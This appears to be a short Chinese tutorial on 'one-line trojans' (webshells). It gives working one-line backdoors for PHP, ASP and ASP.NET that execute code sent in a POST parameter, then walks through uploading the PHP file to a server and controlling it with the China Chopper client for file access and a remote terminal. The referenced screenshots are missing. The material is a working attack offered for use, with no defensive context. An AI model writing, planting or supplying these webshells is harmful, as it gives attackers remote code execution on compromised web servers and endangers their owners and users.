0x00 前言
一句话木马:
<?php @eval($_POST['pass']);?>
ASP: <%eval request("pass")%>
ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
原理:
php的eval()函数:eval($str)函数是把$str当做PHP代码执行。
0x01 实战
- 创建muma.php 然后将<?php @eval($_POST['pass']);?>复制进去
- 然后上传到服务器中
3.上菜刀链接:
右击添加:
右击文件管理:
右击虚拟终端:
0x02 遇到的问题
在下图中,两个必须相同